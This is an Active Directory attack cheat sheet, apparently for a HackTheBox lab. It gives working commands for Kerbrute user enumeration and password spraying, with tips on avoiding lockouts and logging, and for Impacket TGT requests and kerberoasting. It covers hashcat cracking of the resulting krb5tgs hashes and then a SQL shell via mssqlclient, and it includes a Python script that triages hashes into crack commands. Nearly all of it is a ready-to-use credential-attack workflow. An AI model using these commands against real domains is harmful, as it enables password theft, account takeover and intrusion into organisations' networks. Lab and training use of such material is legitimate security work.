Cheat Sheet

Kerbrute

Enumerating Valid Users w/ Kerbrute

  1. Place potentially valid users into a users.txt file (one name per line, without the @domain part)
  2. Execute userenum:

./kerbrute userenum -d htb.local --dc hostname_or_IP_of_DC users.txt

  • Confirmed accounts are printed as [+] VALID USERNAME: user@htb.local
  • userenum sends one AS-REQ per name and reads the KDC's reply, so it needs no password and does not count toward lockout; it produces no 4625 logon failures and only shows up as 4768 events if Kerberos audit logging is enabled on the DC

Password Spray

  1. Gather valid usernames (the userenum output above lists them as user@domain; strip the domain and put them in users.txt)
  2. Check the lockout policy first (e.g. net accounts /domain from a domain-joined host): every failed pre-authentication raises the account's badPwdCount, so spray one password at a time and stay below the lockout threshold within the observation window
  3. Passwordspray:
./kerbrute passwordspray --dc hostname_or_IP_of_DC -d htb.local users.txt <password_here>

  • Hits are printed as [+] VALID LOGIN: user@htb.local:password
  • Unlike userenum, each failed attempt is logged on the DC as 4771 (Kerberos pre-authentication failed)

Impacket

Generate Kerberos TGT w/ Impacket-GetTGT

Generate TGT (add -dc-ip <DC IP> when the domain name does not resolve to the KDC):

impacket-getTGT domain/user:password
  • This will save the ticket as <username>.ccache in the current directory (user.ccache for the example above)

Export KRB5CCNAME so that Impacket's -k option picks the ticket up, and confirm it with klist:

export KRB5CCNAME=user.ccache
klist

Ticket cache: FILE:user.ccache
Default principal: user@domain

Valid Starting        Expires            Service Principal
MM/DD/YYYY TIME       MM/DD/YYYY TIME    krbtgt/domain@domain
        renew until MM/DD/YYYY TIME

  • If klist reports "No credentials cache found", KRB5CCNAME points at the wrong path; if Expires has passed, request a fresh TGT

Kerberoasting w/ Impacket-GetUserSPNs

impacket-GetUserSPNs domain/user -dc-ip hostname_or_ip_of_dc -k

Password: Enter_password_here

  • Leaving :password out of the target makes Impacket prompt for it; domain/user:password skips the prompt
  • With -k and no usable ticket in KRB5CCNAME, Impacket uses the supplied password to get a TGT first

no-pass option (Kerberos auth with the TGT from KRB5CCNAME; -no-pass suppresses the password prompt):

impacket-GetUserSPNs domain/user -dc-ip hostname_or_ip_of_dc -k -no-pass
  • Be sure to utilize the -request option if you want a hash
  • Without it, you will only list the accounts that have an SPN
  • Which is helpful, but what we're really after is a hash
impacket-GetUserSPNs domain/user -dc-ip hostname_or_ip_of_dc -k -no-pass -request
  • -request asks the KDC for a service ticket for every listed SPN and prints each as $krb5tgs$<etype>$...; add -outputfile hashes.txt to write them straight to a file

Getting an error?

  • "The SMB request is not supported. Probably NTLM is disabled."
  • When no -dc-host is given, GetUserSPNs first opens an anonymous SMB (NTLM) connection to the DC just to learn its hostname for the Kerberos service principal; that lookup fails on a domain with NTLM disabled
  • You may be able to fix this with the -dc-host option rather than -dc-ip: give the DC's FQDN (it must resolve, e.g. via /etc/hosts) so the lookup is skipped
impacket-GetUserSPNs domain/user:password -dc-host hostname_of_dc -k

no-pass option:

impacket-GetUserSPNs domain/user -dc-host hostname_of_dc -k -no-pass

Requesting hash:

  • The -request option is required in order to obtain a hash
impacket-GetUserSPNs domain/user -dc-host hostname_of_dc -k -no-pass -request

Cracking krb5tgs Hash

  1. Copy the $krb5tgs$... lines from the GetUserSPNs output (or have GetUserSPNs write them with -outputfile hashes.txt)
  2. Place them in a file called hashes.txt, one hash per line
  3. If you utilize a recent version of hashcat (6.0 or later), it will automatically detect the type of hash; otherwise, or when autodetect reports more than one candidate mode, read the etype after $krb5tgs$ and pass it explicitly: 23 (RC4) is -m 13100, 17 (AES128) is -m 19600, 18 (AES256) is -m 19700
  4. Crack:
hashcat hashes.txt /usr/share/wordlists/rockyou.txt
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt

  5. View password (use the same -m as the cracking run, since --show matches potfile entries by mode):

hashcat -m 13100 hashes.txt --show

  • Etype 23 hashes crack orders of magnitude faster than the AES ones, which go through PBKDF2; crack those first
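Step 1 above says to copy the hashes out of the GetUserSPNs output, and step 3 depends on the etype each one carries. The script below, an added example for this cheat sheet (not part of Impacket or hashcat), does that triage: it keeps only the $krb5tgs$ lines, groups them by the hashcat mode that matches their etype, writes one file per mode and prints the crack commands with RC4 first. It assumes Impacket's -request output formats ($krb5tgs$23$*user$REALM$spn*$... for RC4 and $krb5tgs$17|18$user$REALM$*spn*$... for AES); the sample output, the sql01/web01 hosts and the hex values are constructed and shortened, not real tickets.

```python
"""Triage Kerberoast hashes from GetUserSPNs -request: keep the $krb5tgs$
lines, group them by hashcat mode (derived from the Kerberos etype) and emit
the hashcat commands, cheapest mode first.

Added example for this cheat sheet; not part of Impacket or hashcat. Assumed
Impacket output formats:
  $krb5tgs$23$*user$REALM$spn*$checksum$edata   (RC4-HMAC)
  $krb5tgs$17$user$REALM$*spn*$checksum$edata   (AES128-CTS)
  $krb5tgs$18$user$REALM$*spn*$checksum$edata   (AES256-CTS)
The sample below is constructed; the hex is made up and far too short to be real.
"""
import re
from collections import defaultdict
from pathlib import Path

# Kerberos etype -> hashcat mode. RC4 (23) has no PBKDF2 step and cracks orders
# of magnitude faster than the AES types, so it is the one to try first.
HASHCAT_MODE = {23: 13100, 17: 19600, 18: 19700}

KRB5TGS_RE = re.compile(r"^\$krb5tgs\$(?P<etype>\d+)\$")

# Constructed sample of GetUserSPNs -request output (table plus two hashes).
SAMPLE_OUTPUT = """\
ServicePrincipalName           Name       MemberOf  PasswordLastSet             LastLogon  Delegation
-----------------------------  ---------  --------  --------------------------  ---------  ----------
MSSQLSvc/sql01.htb.local:1433  svc_mssql            2024-01-01 09:00:00.000000  <never>
HTTP/web01.htb.local           svc_web              2024-01-01 09:00:00.000000  <never>

$krb5tgs$23$*svc_mssql$HTB.LOCAL$MSSQLSvc/sql01.htb.local~1433*$0123456789abcdef0123456789abcdef$00112233445566778899aabbccddeeff
$krb5tgs$18$svc_web$HTB.LOCAL$*HTTP/web01.htb.local*$0123456789abcdef01234567$8899aabbccddeeff0011223344556677
"""


def extract_hashes(output: str) -> list[str]:
    """Only the $krb5tgs$ lines; the SPN table and any status lines are dropped."""
    lines = (line.strip() for line in output.splitlines())
    return [line for line in lines if KRB5TGS_RE.match(line)]


def etype_of(krb5tgs_hash: str) -> int:
    m = KRB5TGS_RE.match(krb5tgs_hash)
    if not m:
        raise ValueError(f"not a $krb5tgs$ hash: {krb5tgs_hash[:20]!r}")
    return int(m["etype"])


def account_of(krb5tgs_hash: str) -> tuple[str, str]:
    """(account, realm) the ticket was issued for. The RC4 format wraps
    user$REALM$spn in '*', the AES formats wrap only the spn, so the account is
    field 3 either way once a leading '*' is stripped."""
    fields = krb5tgs_hash.split("$")
    return fields[3].lstrip("*"), fields[4]


def group_by_mode(hashes: list[str]) -> dict[int, list[str]]:
    """hashcat mode -> hashes. An etype without a known mode raises instead of
    being silently dropped (e.g. DES tickets)."""
    groups: dict[int, list[str]] = defaultdict(list)
    for h in hashes:
        etype = etype_of(h)
        if etype not in HASHCAT_MODE:
            raise ValueError(f"no hashcat mode for etype {etype} ({account_of(h)[0]})")
        groups[HASHCAT_MODE[etype]].append(h)
    return dict(groups)


def hashcat_commands(groups: dict[int, list[str]], wordlist: str = "/usr/share/wordlists/rockyou.txt") -> list[str]:
    """One crack command per mode, lowest mode (RC4) first; each mode gets its own file."""
    return [f"hashcat -m {mode} krb5tgs_{mode}.txt {wordlist}" for mode in sorted(groups)]


def write_groups(groups: dict[int, list[str]]) -> list[str]:
    """Write krb5tgs_<mode>.txt files and return their names."""
    names = []
    for mode, hashes in groups.items():
        name = f"krb5tgs_{mode}.txt"
        Path(name).write_text("\n".join(hashes) + "\n")
        names.append(name)
    return names


if __name__ == "__main__":
    groups = group_by_mode(extract_hashes(SAMPLE_OUTPUT))
    for mode, hashes in sorted(groups.items()):
        print(f"-m {mode}: {[account_of(h) for h in hashes]}")
    write_groups(groups)
    print("\n".join(hashcat_commands(groups)))
```

Feed it the real GetUserSPNs output (or the -outputfile file) instead of SAMPLE_OUTPUT; the per-mode files keep hashcat from having to autodetect a mixed list, and the printed commands use the same -m you will need for --show.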

Authenticating to svc_mssql w/ Impacket-mssqlclient

  • Did you get an SPN like MSSQLSvc/host.domain.local:1433 for svc_mssql or something similar?
  • Once that hash is cracked (or with any other domain credentials that have access), you may be able to utilize them to gain a SQL shell on that host with mssqlclient

Impacket-mssqlclient:

impacket-mssqlclient -k domain.local/user@hostname_of_sql_server
  • -k specifies usage of Kerberos: the TGT in KRB5CCNAME (add -no-pass to skip the prompt), or a ticket Impacket requests itself when you put :password after the user
  • The target must be the hostname from the SPN, not its IP, because the service ticket is issued for MSSQLSvc/<hostname>; make sure it resolves (e.g. via /etc/hosts)
  • Without -k, domain credentials need -windows-auth, otherwise mssqlclient attempts SQL-native authentication